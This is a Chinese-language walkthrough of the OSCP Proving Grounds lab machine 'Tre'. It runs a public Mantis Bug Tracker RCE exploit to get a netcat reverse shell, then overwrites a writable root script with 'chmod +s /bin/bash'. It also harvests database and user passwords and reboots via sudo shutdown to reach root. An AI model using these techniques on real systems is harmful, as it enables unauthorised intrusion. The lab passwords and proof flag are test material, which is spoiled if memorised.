OSCP - Proving Grounds - tre

主要知识点

• 突破边界的方法比较多样
• 观察pspy64的检测结果

具体步骤

依旧nmap扫描开始,开放了80,8082,22端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 03:39 UTC
Nmap scan report for 192.168.56.84
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-title: Tre
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

其中80端口会提供比较多的信息，隐藏路径还真不少

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.117.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/cms                  (Status: 301) [Size: 314] [--> http://192.168.117.84/cms/]
/mantisbt             (Status: 301) [Size: 319] [--> http://192.168.117.84/mantisbt/]
/server-status        (Status: 403) [Size: 279]
/system               (Status: 401) [Size: 461]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

其中mantisbt， 搜索一下有一个RCE漏洞，不过目前没有拿到版本信息，只能抱着试试看的想法试试

C:\home\kali\Documents\OFFSEC\play\Tre> searchsploit -m 48818          
  Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/48818
     Path: /usr/share/exploitdb/exploits/php/webapps/48818.py
    Codes: CVE-2019-15715, CVE-2017-7615
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Documents/OFFSEC/play/Tre/48818.py
                                                                                                                                                                                                                                              
C:\home\kali\Documents\OFFSEC\play\Tre> python2 48818.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up

在本地的nc -nlvp 80则会收到reverse shell

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 38846
bash: cannot set terminal process group (569): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tre:/var/www/html/mantisbt$ 

调用pspy64来观察，发现基本上每秒钟都会执行一次，且我们对于这个 /usr/bin/check-system有写权限

2024/12/16 07:47:15 CMD: UID=0    PID=1434   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:16 CMD: UID=0    PID=1436   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:17 CMD: UID=0    PID=1437   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:18 CMD: UID=0    PID=1438   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:19 CMD: UID=0    PID=1439   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:20 CMD: UID=0    PID=1440   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:21 CMD: UID=0    PID=1441   | /bin/bash /usr/bin/check-system 

......
......

www-data@tre:/var/www/html/mantisbt$ ls -l /usr/bin/check-system
ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12  2020 /usr/bin/check-system

www-data@tre:/var/www/html/mantisbt$ cat /usr/bin/check-system
cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
echo "Checking...";
sleep 1;
done

直接覆盖掉，赋予/bin/bash SUID权限，但是发现不成功，怀疑是该脚本循环执行，即使更改文件也无法立刻生效

echo "chmod +s /bin/bash" > /usr/bin/check-system
cat /usr/bin/check-system
chmod +s /bin/bash

上传并执行linpeas.sh，发现一个有趣的文件 /var/www/html/mantisbt/config/config_inc.php,其中包括数据库的用户名和密码,但是无法从命令行登录

$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'mantis';
$g_db_username            = 'mantissuser';
$g_db_password            = 'password@123AS';

继续搜索，发现了一个adminer.php,这个文件在路径爆破的时候没有发现，应该是字典问题

drwxr-xr-x 16 www-data www-data  12288 Apr  1  2017 mantisbt
-rw-r--r--  1 www-data www-data 227984 Oct 24  2017 file.jpg
drwxr-xr-x  3 root     root       4096 May 12  2020 ..
-rw-r--r--  1 www-data www-data    164 May 12  2020 index.html
-rw-r--r--  1 root     root         20 May 12  2020 info.php
drwxr-xr-x 16 root     root      12288 May 12  2020 system
-rw-r--r--  1 root     root     489307 May 12  2020 adminer.php
drwxr-xr-x  5 www-data www-data   4096 May 12  2020 .
drwxr-xr-x  9 www-data www-data   4096 May 12  2020 cms
pwd
/var/www/html

访问一下，是一个mysql 的web UI,用发现的mantissuser/password@123AS来登录，成功,其中mantis_user_table中的tre行对应的realname好像是一个密码，而恰好remote server有一个tre的用户

尝试su tre，成功，并且发现了该用户可以重启服务器

www-data@tre:/tmp$ su tre
su tre
Password: Tr3@123456A!

id
uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown

也许我们可以重启服务器后再看/usr/bin/check-system的改动会不会生效

sudo /sbin/shutdown -r
Shutdown scheduled for Mon 2024-12-16 08:03:36 EST, use 'shutdown -c' to cancel.

Session terminated, killing shell... ...killed.
bash: [1497: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@tre:/var/www/html/mantisbt$ exit

等服务器重启好以后，按照相同的步骤重新创建reverse shell，提权成功

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 37042
bash: cannot set terminal process group (508): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
/bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
22f5d43e241d15a25e6d1eae87510c31